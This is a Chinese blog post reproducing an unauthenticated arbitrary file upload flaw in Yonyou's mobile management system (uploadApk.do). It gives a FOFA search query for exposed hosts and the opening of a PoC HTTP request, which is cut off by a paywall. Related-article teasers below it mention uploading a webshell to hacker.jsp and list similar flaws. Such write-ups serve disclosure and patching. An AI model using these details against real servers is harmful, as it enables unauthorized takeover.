用友移动管理系统 任意文件上传漏洞复现

已于 2023-08-16 08:50:56 修改
阅读量2.4k 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: web安全 安全 网络安全
于 2023-08-12 17:34:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41904294/article/details/132251036
本文介绍了用友移动管理系统中一个严重的安全问题——任意文件上传漏洞。详细阐述了漏洞概述,复现环境以及复现过程,并提供了修复建议,包括限制接口访问权限和升级到安全版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

   用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。

0x02 漏洞概述

  用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

0x03 复现环境

FOFA:app="用友-移动系统管理"

4898a2222644452ea87e2fbcc35db467.png

0x04 漏洞复现

PoC

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox
了解本专栏 订阅专栏 解锁全文 超级会员免费看
用友畅捷通-TPlus FileUploadHandler.ashx 任意文件上传
iSee857的博客
09-29 668
开发的一款企业级财务管理工具,旨在帮助企业实现财务管理的现代化和智能化。作为畅捷通旗下的核心产品,TPlus集成了财务核算、资金管理、预算控制等多项核心功能,通过自动化和智能化的手段,提高企业财务管理效率,降低运营成本。用友畅捷通T+ FileUploadHandler.ashx存在任意文件上传漏洞,攻击者通过该漏洞可以上传任意文件,可能导致服务器被控制。Fofa:app="畅捷通-TPlus"厂商已发布补丁 请即时修复。
用友移动管理系统 多处文件上传漏洞复现
0xSec
01-10 880
用友移动管理系统 /maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
漏洞复现】泛微e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 4125
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞
用友移动管理系统任意文件上传漏洞
CommputerMac的博客
09-29 558
然后访问 http://ip:port/maupload/apk/hacker.jsp 返回如下。批量检测脚本 关注微信公众号 网络安全透视镜 回复 20230929 获取。用友移动管理系统 uploadApk.do 文件存在任意文件上传。将上传内容换成木马即可,例如使用冰蝎马连接。返回如下,则文件上传成功。
用友移动管理系统 任意文件上传
m0_46317063的博客
08-21 380
用友移动管理系统 任意文件上传漏洞[2023-HW 0DAY]
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 6687
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
用友移动管理系统 DownloadServlet 任意文件读取漏洞复现
0xSec
01-27 498
用友移动管理系统 DownloadServlet 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取内部系统敏感文件,使系统处于极不安全的状态。
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2647
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友移动管理系统 任意文件上传漏洞[2023-HW]
holyxp的博客
08-16 692
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
泛微e-Mobile移动管理平台 error 远程命令执行漏洞复现
最新发布
iSee857的博客
11-01 1211
泛微E-Mobile基于泛微成熟产品e-cology,它将协同OA上的公文、流程、通讯录、日程、文件管理、通知公告等应用扩展到手机移动终端,为用户提供更方便更灵活的移动办公应用。移动OA对突发性事件和紧急性事件的处理有极其高效和出色的支持,是管理者、销售人员等经常有外出办公、出差需求的商务人士的贴心的掌上办公产品,适合于已有内部OA系统的大中型企业机构,尤其是企业或部门有较多的分支机构。Fofa:app="泛微-EMobile"厂商已发布补丁 请即时修复。
漏洞复现用友-移动系统管理-maportal-未授权
知黑而守白
01-26 224
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理中的 maportal 接口存在一项未授权访问漏洞,使攻击者能够在未经授权的情况下访问系统。攻击者通过成功利用此漏洞,可获取对系统敏感信息的未经授权访问权限,从而可能导致数据泄露、信息篡改以及系统的安全性受到威胁。
用友移动管理系统 getApp SQL注入漏洞复现
0xSec
01-27 458
用友移动管理系统 getApp功能点未对用户的输入进行过滤,导致存在SQL注入漏洞,利用此漏洞攻击者可以获取数据库敏感信息及凭证,使系统处于极度不安全状态。
漏洞标题: 中国移动mas2.0平台系统漏洞
fengling132的专栏
05-10 2208
漏洞详情 披露状态: 2012-03-26: 细节已通知厂商并且等待厂商处理中 2012-03-26: 厂商已经确认,细节仅向厂商公开 2012-04-05: 细节向核心白帽子及相关领域专家公开 2012-04-15: 细节向普通白帽子公开 2012-04-25: 细节向见习白帽子公开 2012-05-10: 细节向公众公开 简要描述: MAS是中国移动的短信
用友移动管理系统存在任意文件上传漏洞 附POC
nnn2188185的博客
10-06 591
用友移动系统管理旧版本uploadApk接口存在任意文件上传,攻击者可在无需登录的情况下上传恶意文件,执行任意命令。
漏洞复现用友移动管理系统 getApp SQL注入漏洞
KKleeeaa的博客
02-03 514
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。用友移动管理系统中的 getApp 功能点没有对用户的输入进行关键字符过滤,导致存在SQL注入漏洞。攻击者可以进一步获取敏感信息。关闭在互联网上的暴露面或设置接口的访问权限。0x01FOFA语句。
用友全版本任意文件上传漏洞复现
故事讲予风听
07-26 2346
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
漏洞复现用友-移动系统管理-uploadIcon-任意文件上传
知黑而守白
01-26 177
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理允许攻击者通过 uploadIcon 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘
wuli1024的博客
01-31 1852
近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+
智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞
nnn2188185的博客
09-19 241
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发智能AC管理系统HTTPD-AC 1.0服务。
用友U8生产管理系统辅助工具安装使用详解
资源摘要信息: "用友U8管理系统是专门针对用友U8系列企业资源规划(ERP)系统中的生产管理系统模块——高级计划与排程(APS)进行优化和扩展的管理工具。该系统兼容用友U8的多个版本,以SQL作为其数据库系统支撑。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值